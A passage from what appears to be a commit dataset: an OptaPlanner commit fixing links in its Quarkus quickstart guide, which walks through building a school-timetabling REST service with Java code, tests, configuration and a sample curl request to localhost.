Vim support is worse\n* Source blocks are harder to write\n* Bulleted lists are spaced more apart https:\/\/github.com\/asciidoctor\/asciidoctor\/issues\/1087\n\n== Notes\n\n* Vim highlighting and link following\n* Jekyll plugin necessary\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} 
{"commit":"9a416682af68095ee392609aa82179e7ab5dad23","subject":"Fix broken links in quarkus docs","message":"Fix broken links in quarkus docs\n","repos":"baldimir\/optaplanner,baldimir\/optaplanner,tkobayas\/optaplanner,tkobayas\/optaplanner,tkobayas\/optaplanner,tkobayas\/optaplanner,baldimir\/optaplanner,baldimir\/optaplanner","old_file":"optaplanner-docs\/src\/modules\/ROOT\/pages\/quickstart\/quarkus\/quarkus-quickstart.adoc","new_file":"optaplanner-docs\/src\/modules\/ROOT\/pages\/quickstart\/quarkus\/quarkus-quickstart.adoc","new_contents":"[[quarkusJavaQuickStart]]\n= Quarkus Java quick start\n:doctype: book\n:imagesdir: ..\/..\n:sectnums:\n:icons: font\n:quickstartsCloneUrl: https:\/\/github.com\/kiegroup\/optaplanner-quickstarts\n:quickstartsArchiveUrl: https:\/\/www.optaplanner.org\/download\/download.html\n:quarkusQuickstartUrl: https:\/\/github.com\/kiegroup\/optaplanner-quickstarts\/tree\/stable\/use-cases\/school-timetabling\n\n\/\/ Keep this in sync with the quarkus repo's copy\n\/\/ https:\/\/github.com\/quarkusio\/quarkus\/blob\/main\/docs\/src\/main\/asciidoc\/optaplanner.adoc\n\/\/ Keep this also in sync with spring-boot-quickstart.adoc where applicable\n\nThis guide walks you through the process of creating a https:\/\/quarkus.io\/[Quarkus] application\nwith https:\/\/www.optaplanner.org\/[OptaPlanner]'s constraint solving Artificial Intelligence (AI).\n\n== What you will build\n\nYou will build a REST application that optimizes a school timetable for students and teachers:\n\nimage::quickstart\/school-timetabling\/schoolTimetablingScreenshot.png[]\n\nYour service will assign `Lesson` instances to `Timeslot` and `Room` instances automatically\nby using AI to adhere to hard and soft scheduling _constraints_, such as the following examples:\n\n* A room can have at most one lesson at the same time.\n* A teacher can teach at most one lesson at the same time.\n* A student can attend at most one lesson at the same time.\n* A teacher prefers to teach all lessons in the same room.\n* A teacher prefers to teach sequential lessons and dislikes gaps between lessons.\n* A student dislikes sequential lessons on the same subject.\n\nMathematically speaking, school timetabling is an _NP-hard_ problem.\nThis means it is difficult to scale.\nSimply brute force iterating through all possible combinations takes millions of years\nfor a non-trivial dataset, even on a supercomputer.\nLuckily, AI constraint solvers such as OptaPlanner have advanced algorithms\nthat deliver a near-optimal solution in a reasonable amount of time.\n\n== Solution source code\n\nFollow the instructions in the next sections to create the application step by step (recommended).\n\nAlternatively, you can also skip right to the completed example:\n\n. Clone the Git repository:\n+\n[source,shell,subs=attributes+]\n----\n$ git clone {quickstartsCloneUrl}\n----\n+\nor download an {quickstartsArchiveUrl}[archive].\n\n. 
Find the solution in {quarkusQuickstartUrl}[the `use-cases` directory]\nand run it (see its README file).\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* https:\/\/adoptopenjdk.net\/[JDK] {java-version}+ with `JAVA_HOME` configured appropriately\n* https:\/\/maven.apache.org\/download.html[Apache Maven] {maven-version}+ or https:\/\/gradle.org\/install\/[Gradle] 4+\n* An IDE, such as https:\/\/www.jetbrains.com\/idea[IntelliJ IDEA], VSCode or Eclipse\n\n== The build file and the dependencies\n\nUse https:\/\/code.quarkus.io\/[code.quarkus.io] to generate an application\nwith the following extensions, for Maven or Gradle:\n\n* RESTEasy JAX-RS (`quarkus-resteasy`)\n* RESTEasy Jackson (`quarkus-resteasy-jackson`)\n* OptaPlanner (`optaplanner-quarkus`)\n* OptaPlanner Jackson (`optaplanner-quarkus-jackson`)\n\nAlternatively, generate it from the command line with Maven:\n\n[source,shell,subs=attributes+]\n----\n$ mvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=optaplanner-quickstart \\\n -Dextensions=\"resteasy,resteasy-jackson,optaplanner-quarkus,optaplanner-quarkus-jackson\" \\\n -DnoExamples\n$ cd optaplanner-quickstart\n----\n\nIn Maven, your `pom.xml` file contains these dependencies:\n\n[source,xml,subs=attributes+]\n----\n <dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-universe-bom<\/artifactId>\n <version>{quarkus-version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n <\/dependencies>\n <\/dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy-jackson<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-quarkus<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-quarkus-jackson<\/artifactId>\n <\/dependency>\n\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-junit5<\/artifactId>\n <scope>test<\/scope>\n <\/dependency>\n <\/dependencies>\n----\n\n\/\/On the other hand, in Gradle, your `build.gradle` file contains these dependencies:\n\/\/\n\/\/[source,groovy,subs=attributes+]\n\/\/----\n\/\/dependencies {\n\/\/ implementation enforcedPlatform(\"io.quarkus:quarkus-universe-bom:{quarkus-version}\")\n\/\/ implementation 'io.quarkus:quarkus-resteasy'\n\/\/ implementation 'io.quarkus:quarkus-resteasy-jackson'\n\/\/ implementation 'org.optaplanner:optaplanner-quarkus'\n\/\/ implementation 'org.optaplanner:optaplanner-quarkus-jackson'\n\/\/\n\/\/ testImplementation 'io.quarkus:quarkus-junit5'\n\/\/}\n\/\/----\n\ninclude::..\/school-timetabling\/school-timetabling-model.adoc[leveloffset=+1]\ninclude::..\/school-timetabling\/school-timetabling-constraints.adoc[leveloffset=+1]\ninclude::..\/school-timetabling\/school-timetabling-solution.adoc[leveloffset=+1]\n\n== Create the solver service\n\nNow you are ready to put everything together and create a REST service.\nBut solving planning problems on REST threads causes HTTP timeout issues.\nTherefore, the Quarkus extension injects a `SolverManager` instance,\nwhich runs solvers in a separate thread pool\nand can solve multiple datasets in parallel.\n\nCreate the `src\/main\/java\/org\/acme\/schooltimetabling\/rest\/TimeTableResource.java` 
class:\n\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport java.util.UUID;\nimport java.util.concurrent.ExecutionException;\nimport javax.inject.Inject;\nimport javax.ws.rs.POST;\nimport javax.ws.rs.Path;\n\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.optaplanner.core.api.solver.SolverJob;\nimport org.optaplanner.core.api.solver.SolverManager;\n\n@Path(\"\/timeTable\")\npublic class TimeTableResource {\n\n @Inject\n SolverManager<TimeTable, UUID> solverManager;\n\n @POST\n @Path(\"\/solve\")\n public TimeTable solve(TimeTable problem) {\n UUID problemId = UUID.randomUUID();\n \/\/ Submit the problem to start solving\n SolverJob<TimeTable, UUID> solverJob = solverManager.solve(problemId, problem);\n TimeTable solution;\n try {\n \/\/ Wait until the solving ends\n solution = solverJob.getFinalBestSolution();\n } catch (InterruptedException | ExecutionException e) {\n throw new IllegalStateException(\"Solving failed.\", e);\n }\n return solution;\n }\n\n}\n----\n\nFor simplicity's sake, this initial implementation waits for the solver to finish,\nwhich can still cause an HTTP timeout.\nThe _complete_ implementation avoids HTTP timeouts much more elegantly.\n\n== Set the termination time\n\nWithout a termination setting or a `terminationEarly()` event, the solver runs forever.\nTo avoid that, limit the solving time to five seconds.\nThat is short enough to avoid the HTTP timeout.\n\nCreate the `src\/main\/resources\/application.properties` file:\n\n[source,properties]\n----\n# The solver runs only for 5 seconds to avoid a HTTP timeout in this simple implementation.\n# It's recommended to run for at least 5 minutes (\"5m\") otherwise.\nquarkus.optaplanner.solver.termination.spent-limit=5s\n----\n\nOptaPlanner returns _the best solution_ found in the available termination time.\nDue to xref:optimization-algorithms\/optimization-algorithms.adoc#doesPlannerFindTheOptimalSolution[the nature of NP-hard problems],\nthe best solution might not be optimal, especially for larger datasets.\nIncrease the termination time to potentially find a better solution.\n\n== Run the application\n\nFirst start the application:\n\n[source,shell]\n----\n$ mvn compile quarkus:dev\n----\n\n=== Try the application\n\nNow that the application is running, you can test the REST service.\nYou can use any REST client you wish.\nThe following example uses the Linux command `curl` to send a POST request:\n\n[source,shell]\n----\n$ curl -i -X POST http:\/\/localhost:8080\/timeTable\/solve -H \"Content-Type:application\/json\" -d '{\"timeslotList\":[{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"08:30:00\",\"endTime\":\"09:30:00\"},{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"09:30:00\",\"endTime\":\"10:30:00\"}],\"roomList\":[{\"name\":\"Room A\"},{\"name\":\"Room B\"}],\"lessonList\":[{\"id\":1,\"subject\":\"Math\",\"teacher\":\"A. Turing\",\"studentGroup\":\"9th grade\"},{\"id\":2,\"subject\":\"Chemistry\",\"teacher\":\"M. Curie\",\"studentGroup\":\"9th grade\"},{\"id\":3,\"subject\":\"French\",\"teacher\":\"M. Curie\",\"studentGroup\":\"10th grade\"},{\"id\":4,\"subject\":\"History\",\"teacher\":\"I. 
Jones\",\"studentGroup\":\"10th grade\"}]}'\n----\n\nAfter about five seconds, according to the termination spent time defined in your `application.properties`,\nthe service returns an output similar to the following example:\n\n[source]\n----\nHTTP\/1.1 200\nContent-Type: application\/json\n...\n\n{\"timeslotList\":...,\"roomList\":...,\"lessonList\":[{\"id\":1,\"subject\":\"Math\",\"teacher\":\"A. Turing\",\"studentGroup\":\"9th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"08:30:00\",\"endTime\":\"09:30:00\"},\"room\":{\"name\":\"Room A\"}},{\"id\":2,\"subject\":\"Chemistry\",\"teacher\":\"M. Curie\",\"studentGroup\":\"9th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"09:30:00\",\"endTime\":\"10:30:00\"},\"room\":{\"name\":\"Room A\"}},{\"id\":3,\"subject\":\"French\",\"teacher\":\"M. Curie\",\"studentGroup\":\"10th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"08:30:00\",\"endTime\":\"09:30:00\"},\"room\":{\"name\":\"Room B\"}},{\"id\":4,\"subject\":\"History\",\"teacher\":\"I. Jones\",\"studentGroup\":\"10th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"09:30:00\",\"endTime\":\"10:30:00\"},\"room\":{\"name\":\"Room B\"}}],\"score\":\"0hard\/0soft\"}\n----\n\nNotice that your application assigned all four lessons to one of the two time slots and one of the two rooms.\nAlso notice that it conforms to all hard constraints.\nFor example, M. Curie's two lessons are in different time slots.\n\nOn the server side, the `info` log shows what OptaPlanner did in those five seconds:\n\n[source,options=\"nowrap\"]\n----\n... Solving started: time spent (33), best score (-8init\/0hard\/0soft), environment mode (REPRODUCIBLE), random (JDK with seed 0).\n... Construction Heuristic phase (0) ended: time spent (73), best score (0hard\/0soft), score calculation speed (459\/sec), step total (4).\n... Local Search phase (1) ended: time spent (5000), best score (0hard\/0soft), score calculation speed (28949\/sec), step total (28398).\n... 
Solving ended: time spent (5000), best score (0hard\/0soft), score calculation speed (28524\/sec), phase total (2), environment mode (REPRODUCIBLE).\n----\n\n=== Test the application\n\nA good application includes test coverage.\n\n==== Test the constraints\n\nTo test each constraint in isolation, use a `ConstraintVerifier` in unit tests.\nIt tests each constraint's corner cases in isolation from the other tests,\nwhich lowers maintenance when adding a new constraint with proper test coverage.\n\nAdd an `optaplanner-test` dependency in your `pom.xml`:\n[source,xml]\n----\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-test<\/artifactId>\n <scope>test<\/scope>\n <\/dependency>\n----\n\nCreate the `src\/test\/java\/org\/acme\/schooltimetabling\/solver\/TimeTableConstraintProviderTest.java` class:\n\n[source,java]\n----\npackage org.acme.schooltimetabling.solver;\n\nimport java.time.DayOfWeek;\nimport java.time.LocalTime;\n\nimport javax.inject.Inject;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.Room;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.acme.schooltimetabling.domain.Timeslot;\nimport org.junit.jupiter.api.Test;\nimport org.optaplanner.test.api.score.stream.ConstraintVerifier;\n\n@QuarkusTest\nclass TimeTableConstraintProviderTest {\n\n private static final Room ROOM = new Room(\"Room1\");\n private static final Timeslot TIMESLOT1 = new Timeslot(DayOfWeek.MONDAY, LocalTime.of(9,0), LocalTime.NOON);\n private static final Timeslot TIMESLOT2 = new Timeslot(DayOfWeek.TUESDAY, LocalTime.of(9,0), LocalTime.NOON);\n\n @Inject\n ConstraintVerifier<TimeTableConstraintProvider, TimeTable> constraintVerifier;\n\n @Test\n void roomConflict() {\n Lesson firstLesson = new Lesson(1, \"Subject1\", \"Teacher1\", \"Group1\");\n Lesson conflictingLesson = new Lesson(2, \"Subject2\", \"Teacher2\", \"Group2\");\n Lesson nonConflictingLesson = new Lesson(3, \"Subject3\", \"Teacher3\", \"Group3\");\n\n firstLesson.setRoom(ROOM);\n firstLesson.setTimeslot(TIMESLOT1);\n\n conflictingLesson.setRoom(ROOM);\n conflictingLesson.setTimeslot(TIMESLOT1);\n\n nonConflictingLesson.setRoom(ROOM);\n nonConflictingLesson.setTimeslot(TIMESLOT2);\n\n constraintVerifier.verifyThat(TimeTableConstraintProvider::roomConflict)\n .given(firstLesson, conflictingLesson, nonConflictingLesson)\n .penalizesBy(1);\n }\n\n}\n----\n\nThis test verifies that the constraint `TimeTableConstraintProvider::roomConflict`,\nwhen given three lessons in the same room, where two lessons have the same timeslot,\npenalizes with a match weight of `1`.\nSo with a constraint weight of `10hard` it would reduce the score by `-10hard`.\n\nNotice how `ConstraintVerifier` ignores the constraint weight during testing - even\nif those constraint weights are hard coded in the `ConstraintProvider` - because\nconstraint weights change regularly before going into production.\nThis way, constraint weight tweaking does not break the unit tests.\n\n==== Test the solver\n\nIn a JUnit test, generate a test dataset and send it to the `TimeTableResource` to solve.\n\nCreate the `src\/test\/java\/org\/acme\/schooltimetabling\/rest\/TimeTableResourceTest.java` class:\n\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport java.time.DayOfWeek;\nimport java.time.LocalTime;\nimport java.util.ArrayList;\nimport java.util.List;\n\nimport javax.inject.Inject;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport 
org.acme.schooltimetabling.domain.Room;\nimport org.acme.schooltimetabling.domain.Timeslot;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.acme.schooltimetabling.rest.TimeTableResource;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.api.Timeout;\n\nimport static org.junit.jupiter.api.Assertions.assertFalse;\nimport static org.junit.jupiter.api.Assertions.assertNotNull;\nimport static org.junit.jupiter.api.Assertions.assertTrue;\n\n@QuarkusTest\npublic class TimeTableResourceTest {\n\n @Inject\n TimeTableResource timeTableResource;\n\n @Test\n @Timeout(600_000)\n public void solve() {\n TimeTable problem = generateProblem();\n TimeTable solution = timeTableResource.solve(problem);\n assertFalse(solution.getLessonList().isEmpty());\n for (Lesson lesson : solution.getLessonList()) {\n assertNotNull(lesson.getTimeslot());\n assertNotNull(lesson.getRoom());\n }\n assertTrue(solution.getScore().isFeasible());\n }\n\n private TimeTable generateProblem() {\n List<Timeslot> timeslotList = new ArrayList<>();\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(8, 30), LocalTime.of(9, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(9, 30), LocalTime.of(10, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(10, 30), LocalTime.of(11, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(13, 30), LocalTime.of(14, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(14, 30), LocalTime.of(15, 30)));\n\n List<Room> roomList = new ArrayList<>();\n roomList.add(new Room(\"Room A\"));\n roomList.add(new Room(\"Room B\"));\n roomList.add(new Room(\"Room C\"));\n\n List<Lesson> lessonList = new ArrayList<>();\n lessonList.add(new Lesson(101L, \"Math\", \"B. May\", \"9th grade\"));\n lessonList.add(new Lesson(102L, \"Physics\", \"M. Curie\", \"9th grade\"));\n lessonList.add(new Lesson(103L, \"Geography\", \"M. Polo\", \"9th grade\"));\n lessonList.add(new Lesson(104L, \"English\", \"I. Jones\", \"9th grade\"));\n lessonList.add(new Lesson(105L, \"Spanish\", \"P. Cruz\", \"9th grade\"));\n\n lessonList.add(new Lesson(201L, \"Math\", \"B. May\", \"10th grade\"));\n lessonList.add(new Lesson(202L, \"Chemistry\", \"M. Curie\", \"10th grade\"));\n lessonList.add(new Lesson(203L, \"History\", \"I. Jones\", \"10th grade\"));\n lessonList.add(new Lesson(204L, \"English\", \"P. Cruz\", \"10th grade\"));\n lessonList.add(new Lesson(205L, \"French\", \"M. 
Curie\", \"10th grade\"));\n return new TimeTable(timeslotList, roomList, lessonList);\n }\n\n}\n----\n\nThis test verifies that after solving, all lessons are assigned to a time slot and a room.\nIt also verifies that it found a feasible solution (no hard constraints broken).\n\nAdd test properties to the `src\/main\/resources\/application.properties` file:\n\n[source,properties]\n----\nquarkus.optaplanner.solver.termination.spent-limit=5s\n\n# Effectively disable spent-time termination in favor of the best-score-limit\n%test.quarkus.optaplanner.solver.termination.spent-limit=1h\n%test.quarkus.optaplanner.solver.termination.best-score-limit=0hard\/*soft\n----\n\nNormally, the solver finds a feasible solution in less than 200 milliseconds.\nNotice how the `application.properties` overwrites the solver termination during tests\nto terminate as soon as a feasible solution (`0hard\/*soft`) is found.\nThis avoids hard coding a solver time, because the unit test might run on arbitrary hardware.\nThis approach ensures that the test runs long enough to find a feasible solution, even on slow machines.\nBut it does not run a millisecond longer than it strictly must, even on fast machines.\n\n=== Logging\n\nWhen adding constraints in your `ConstraintProvider`,\nkeep an eye on the _score calculation speed_ in the `info` log,\nafter solving for the same amount of time, to assess the performance impact:\n\n[source]\n----\n... Solving ended: ..., score calculation speed (29455\/sec), ...\n----\n\nTo understand how OptaPlanner is solving your problem internally,\nchange the logging in the `application.properties` file or with a `-D` system property:\n\n[source,properties]\n----\nquarkus.log.category.\"org.optaplanner\".level=debug\n----\n\nUse `debug` logging to show every _step_:\n\n[source,options=\"nowrap\"]\n----\n... Solving started: time spent (67), best score (-20init\/0hard\/0soft), environment mode (REPRODUCIBLE), random (JDK with seed 0).\n... CH step (0), time spent (128), score (-18init\/0hard\/0soft), selected move count (15), picked move ([Math(101) {null -> Room A}, Math(101) {null -> MONDAY 08:30}]).\n... CH step (1), time spent (145), score (-16init\/0hard\/0soft), selected move count (15), picked move ([Physics(102) {null -> Room A}, Physics(102) {null -> MONDAY 09:30}]).\n...\n----\n\nUse `trace` logging to show every _step_ and every _move_ per step.\n\n== Summary\n\nCongratulations!\nYou have just developed a Quarkus application with https:\/\/www.optaplanner.org\/[OptaPlanner]!\n\n== Further improvements: Database and UI integration\n\nNow try adding database and UI integration:\n\n. Store `Timeslot`, `Room`, and `Lesson` in the database with https:\/\/quarkus.io\/guides\/hibernate-orm-panache[Hibernate and Panache].\n\n. https:\/\/quarkus.io\/guides\/rest-json[Expose them through REST].\n\n. 
Adjust the `TimeTableResource` to read and write a `TimeTable` instance in a single transaction\nand use those accordingly:\n+\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport javax.inject.Inject;\nimport javax.transaction.Transactional;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.POST;\nimport javax.ws.rs.Path;\n\nimport io.quarkus.panache.common.Sort;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.Room;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.acme.schooltimetabling.domain.Timeslot;\nimport org.optaplanner.core.api.score.ScoreManager;\nimport org.optaplanner.core.api.score.buildin.hardsoft.HardSoftScore;\nimport org.optaplanner.core.api.solver.SolverManager;\nimport org.optaplanner.core.api.solver.SolverStatus;\n\n@Path(\"\/timeTable\")\npublic class TimeTableResource {\n\n public static final Long SINGLETON_TIME_TABLE_ID = 1L;\n\n @Inject\n SolverManager<TimeTable, Long> solverManager;\n @Inject\n ScoreManager<TimeTable, HardSoftScore> scoreManager;\n\n \/\/ To try, open http:\/\/localhost:8080\/timeTable\n @GET\n public TimeTable getTimeTable() {\n \/\/ Get the solver status before loading the solution\n \/\/ to avoid the race condition that the solver terminates between them\n SolverStatus solverStatus = getSolverStatus();\n TimeTable solution = findById(SINGLETON_TIME_TABLE_ID);\n scoreManager.updateScore(solution); \/\/ Sets the score\n solution.setSolverStatus(solverStatus);\n return solution;\n }\n\n @POST\n @Path(\"\/solve\")\n public void solve() {\n solverManager.solveAndListen(SINGLETON_TIME_TABLE_ID,\n this::findById,\n this::save);\n }\n\n public SolverStatus getSolverStatus() {\n return solverManager.getSolverStatus(SINGLETON_TIME_TABLE_ID);\n }\n\n @POST\n @Path(\"\/stopSolving\")\n public void stopSolving() {\n solverManager.terminateEarly(SINGLETON_TIME_TABLE_ID);\n }\n\n @Transactional\n protected TimeTable findById(Long id) {\n if (!SINGLETON_TIME_TABLE_ID.equals(id)) {\n throw new IllegalStateException(\"There is no timeTable with id (\" + id + \").\");\n }\n \/\/ Occurs in a single transaction, so each initialized lesson references the same timeslot\/room instance\n \/\/ that is contained by the timeTable's timeslotList\/roomList.\n return new TimeTable(\n Timeslot.listAll(Sort.by(\"dayOfWeek\").and(\"startTime\").and(\"endTime\").and(\"id\")),\n Room.listAll(Sort.by(\"name\").and(\"id\")),\n Lesson.listAll(Sort.by(\"subject\").and(\"teacher\").and(\"studentGroup\").and(\"id\")));\n }\n\n @Transactional\n protected void save(TimeTable timeTable) {\n for (Lesson lesson : timeTable.getLessonList()) {\n \/\/ TODO this is awfully naive: optimistic locking causes issues if called by the SolverManager\n Lesson attachedLesson = Lesson.findById(lesson.getId());\n attachedLesson.setTimeslot(lesson.getTimeslot());\n attachedLesson.setRoom(lesson.getRoom());\n }\n }\n\n}\n----\n+\nFor simplicity's sake, this code handles only one `TimeTable` instance,\nbut it is straightforward to enable multi-tenancy and handle multiple `TimeTable` instances of different high schools in parallel.\n+\nThe `getTimeTable()` method returns the latest timetable from the database.\nIt uses the `ScoreManager` (which is automatically injected)\nto calculate the score of that timetable, so the UI can show the score.\n+\nThe `solve()` method starts a job to solve the current timetable and store the time slot and room assignments in the database.\nIt uses the `SolverManager.solveAndListen()` method to listen to 
intermediate best solutions\nand update the database accordingly.\nThis enables the UI to show progress while the backend is still solving.\n\n. Adjust the `TimeTableResourceTest` instance accordingly, now that the `solve()` method returns immediately.\nPoll for the latest solution until the solver finishes solving:\n+\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport javax.inject.Inject;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.api.Timeout;\nimport org.optaplanner.core.api.solver.SolverStatus;\n\nimport static org.junit.jupiter.api.Assertions.assertFalse;\nimport static org.junit.jupiter.api.Assertions.assertNotNull;\nimport static org.junit.jupiter.api.Assertions.assertTrue;\n\n@QuarkusTest\npublic class TimeTableResourceTest {\n\n @Inject\n TimeTableResource timeTableResource;\n\n @Test\n @Timeout(600_000)\n public void solveDemoDataUntilFeasible() throws InterruptedException {\n timeTableResource.solve();\n TimeTable timeTable = timeTableResource.getTimeTable();\n while (timeTable.getSolverStatus() != SolverStatus.NOT_SOLVING) {\n \/\/ Quick polling (not a Test Thread Sleep anti-pattern)\n \/\/ Test is still fast on fast machines and doesn't randomly fail on slow machines.\n Thread.sleep(20L);\n timeTable = timeTableResource.getTimeTable();\n }\n assertFalse(timeTable.getLessonList().isEmpty());\n for (Lesson lesson : timeTable.getLessonList()) {\n assertNotNull(lesson.getTimeslot());\n assertNotNull(lesson.getRoom());\n }\n assertTrue(timeTable.getScore().isFeasible());\n }\n\n}\n----\n\n. Build an attractive web UI on top of these REST methods to visualize the timetable.\n\nTake a look at {quarkusQuickstartUrl}[the quickstart source code] to see how this all turns out.\n","old_contents":"[[quarkusJavaQuickStart]]\n= Quarkus Java quick start\n:doctype: book\n:imagesdir: ..\/..\n:sectnums:\n:icons: font\n:quickstartsCloneUrl: https:\/\/github.com\/kiegroup\/optaplanner-quickstarts\n:quickstartsArchiveUrl: https:\/\/www.optaplanner.org\/download\/download.html\n:quarkusQuickstartUrl: https:\/\/github.com\/kiegroup\/optaplanner-quickstarts\/tree\/stable\/use-cases\/school-timetabling\n\n\/\/ Keep this in sync with the quarkus repo's copy\n\/\/ https:\/\/github.com\/quarkusio\/quarkus\/blob\/main\/docs\/src\/main\/asciidoc\/optaplanner.adoc\n\/\/ Keep this also in sync with spring-boot-quickstart.adoc where applicable\n\nThis guide walks you through the process of creating a https:\/\/quarkus.io\/[Quarkus] application\nwith https:\/\/www.optaplanner.org\/[OptaPlanner]'s constraint solving Artificial Intelligence (AI).\n\n== What you will build\n\nYou will build a REST application that optimizes a school timetable for students and teachers:\n\nimage::quickstart\/school-timetabling\/schoolTimetablingScreenshot.png[]\n\nYour service will assign `Lesson` instances to `Timeslot` and `Room` instances automatically\nby using AI to adhere to hard and soft scheduling _constraints_, such as the following examples:\n\n* A room can have at most one lesson at the same time.\n* A teacher can teach at most one lesson at the same time.\n* A student can attend at most one lesson at the same time.\n* A teacher prefers to teach all lessons in the same room.\n* A teacher prefers to teach sequential lessons and dislikes gaps between lessons.\n* A student dislikes sequential lessons on the same subject.\n\nMathematically 
speaking, school timetabling is an _NP-hard_ problem.\nThis means it is difficult to scale.\nSimply brute force iterating through all possible combinations takes millions of years\nfor a non-trivial dataset, even on a supercomputer.\nLuckily, AI constraint solvers such as OptaPlanner have advanced algorithms\nthat deliver a near-optimal solution in a reasonable amount of time.\n\n== Solution source code\n\nFollow the instructions in the next sections to create the application step by step (recommended).\n\nAlternatively, you can also skip right to the completed example:\n\n. Clone the Git repository:\n+\n[source,shell,subs=attributes+]\n----\n$ git clone {quickstartsCloneUrl}\n----\n+\nor download an {quickstartsArchiveUrl}[archive].\n\n. Find the solution in {quarkusQuickstartUrl}[the `use-cases` directory]\nand run it (see its README file).\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* https:\/\/adoptopenjdk.net\/[JDK] {java-version}+ with `JAVA_HOME` configured appropriately\n* https:\/\/maven.apache.org\/download.html[Apache Maven] {maven-version}+ or https:\/\/gradle.org\/install\/[Gradle] 4+\n* An IDE, such as https:\/\/www.jetbrains.com\/idea[IntelliJ IDEA], VSCode or Eclipse\n\n== The build file and the dependencies\n\nUse https:\/\/code.quarkus.io\/[code.quarkus.io] to generate an application\nwith the following extensions, for Maven or Gradle:\n\n* RESTEasy JAX-RS (`quarkus-resteasy`)\n* RESTEasy Jackson (`quarkus-resteasy-jackson`)\n* OptaPlanner (`optaplanner-quarkus`)\n* OptaPlanner Jackson (`optaplanner-quarkus-jackson`)\n\nAlternatively, generate it from the command line with Maven:\n\n[source,shell,subs=attributes+]\n----\n$ mvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=optaplanner-quickstart \\\n -Dextensions=\"resteasy,resteasy-jackson,optaplanner-quarkus,optaplanner-quarkus-jackson\" \\\n -DnoExamples\n$ cd optaplanner-quickstart\n----\n\nIn Maven, your `pom.xml` file contains these dependencies:\n\n[source,xml,subs=attributes+]\n----\n <dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-universe-bom<\/artifactId>\n <version>{quarkus-version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n <\/dependencies>\n <\/dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy-jackson<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-quarkus<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-quarkus-jackson<\/artifactId>\n <\/dependency>\n\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-junit5<\/artifactId>\n <scope>test<\/scope>\n <\/dependency>\n <\/dependencies>\n----\n\n\/\/On the other hand, in Gradle, your `build.gradle` file contains these dependencies:\n\/\/\n\/\/[source,groovy,subs=attributes+]\n\/\/----\n\/\/dependencies {\n\/\/ implementation enforcedPlatform(\"io.quarkus:quarkus-universe-bom:{quarkus-version}\")\n\/\/ implementation 'io.quarkus:quarkus-resteasy'\n\/\/ implementation 'io.quarkus:quarkus-resteasy-jackson'\n\/\/ implementation 'org.optaplanner:optaplanner-quarkus'\n\/\/ implementation 'org.optaplanner:optaplanner-quarkus-jackson'\n\/\/\n\/\/ testImplementation 
